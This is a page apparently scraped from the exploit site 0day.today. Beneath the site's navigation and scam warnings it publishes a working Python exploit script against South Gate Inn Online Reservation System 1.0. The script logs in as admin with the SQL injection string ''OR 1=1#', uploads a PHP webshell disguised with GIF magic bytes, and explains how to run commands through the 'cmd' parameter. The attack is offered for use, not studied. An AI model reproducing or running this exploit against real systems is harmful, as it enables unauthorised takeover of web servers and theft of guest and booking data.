0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
South Gate Inn Online Reservation System 1.0 Shell Upload / SQL Injection Vulnerabilities
# Exploit Title: South Gate Inn Online Reservation System v1.0 - Remote Code Execution # Exploit Author: Janik Wehrli # Vendor Homepage: https://www.sourcecodester.com/php/10584/south-gate-inn-online-reservation-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/southgateinn.zip # Version: 1.0 # Tested On: Ubuntu 18.04,Windows 10 + XAMPP 7.4 # Description: The South Gate Inn Online Reservation System suffers from an SQLi authentication bypass which leads to Admin access on the application. From there it's possible to upload a malicious PHP file to the server by changing a Room Image (getimagesize bypass). Both SQL queries and file validations are not handled properly, which leaves the Webserver in a vulnerable state. import requests, sys from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) F = [Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE] B = [Back.RESET, Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE] S = [Style.RESET_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT] info = S[3] + F[5] + '[' + S[0] + S[3] + '-' + S[3] + F[5] + ']' + S[0] + ' ' err = S[3] + F[2] + '[' + S[0] + S[3] + '!' + S[3] + F[2] + ']' + S[0] + ' ' ok = S[3] + F[3] + '[' + S[0] + S[3] + '+' + S[3] + F[3] + ']' + S[0] + ' ' ASCII_ART = """ _.---._ /\\ ./' "--`\// ./ o \ /./\ )______ \__ \ ./ / /\ \ | \ \ \ \ / / \ \ | |\ \ \7 " " " " SouthGateInn RCE v1.0 Janik Wehrli """ # Set variables print(ASCII_ART) SERVER_URL = str( input("Type in your SouthGateInn System v1.0 Location e.g http://192.168.20.20/southgateinn/SouthGateInn: \n")) LOGIN_URL = SERVER_URL + '/admin/login.php' UPLOAD_URL = SERVER_URL + "/admin/mod_room/controller.php?action=editimage" PWN_URL = SERVER_URL + "/admin/mod_room/rooms/" USERNAME = "'OR 1=1#" PASSWORD = "PWNED" WEBSHELL_NAME = "pwn.php" # Uncomment the bottom line to run the exploit through a proxy such as burp # proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} # Create a simple web session with python s = requests.Session() # GET request to webserver - Start a session & retrieve a session cookie get_session = s.get(LOGIN_URL, verify=False) # Check connection to website & print session cookie to terminal OR die if get_session.status_code == 200: print(ok + 'Successfully connected to SouthGateInn System v1.0 server & created session.') print(info + "Session Cookie: " + get_session.headers['Set-Cookie']) else: print(err + 'Cannot connect to the server and create a web session.') sys.exit(-1) # 1. Bypass Login to get Admin access # POST data to bypass Authentication via SQL Injection login_data = {'username': USERNAME, 'password': PASSWORD, 'login': ''} print( info + "Attempting to Login to SouthGateInn System v1.0 the following payload: " + "username:" + USERNAME + ":" + "password:" + PASSWORD) # auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies) auth = s.post(url=LOGIN_URL, data=login_data, verify=False, allow_redirects=True) if auth.status_code == 200: print(ok, "Login Success") else: print(err, "Something Went Wrong") # 2. Upload simple PHP Webshell to get command execution # Content-Disposition: form-data; name="image"; filename="pwn.php" # Content-Type: application/octet-stream webshell = { 'image': ( WEBSHELL_NAME, 'GIF89a <?php echo shell_exec($_GET["cmd"]);?>', 'application/octet-stream', {'Content-Disposition': 'form-data'} ) } print(info + "Upload Webshell via insecure verification of images (getimagesize()) add GIF Magic Bytes") print(info + "Send Post malicious POST Request to the Server") upload_webshell = s.post(url=UPLOAD_URL, files=webshell, verify=False) if "window.location='index.php'" in upload_webshell.text: print(ok, "Success") print(ok, "Your Webshell is located under: " + PWN_URL + WEBSHELL_NAME) print(ok, "Execute Commands via the GET Parameter 'cmd' for e.g " + PWN_URL + WEBSHELL_NAME + "?cmd=whoami") else: print(err, "Something Went Wrong") # 0day.today [2024-09-29] #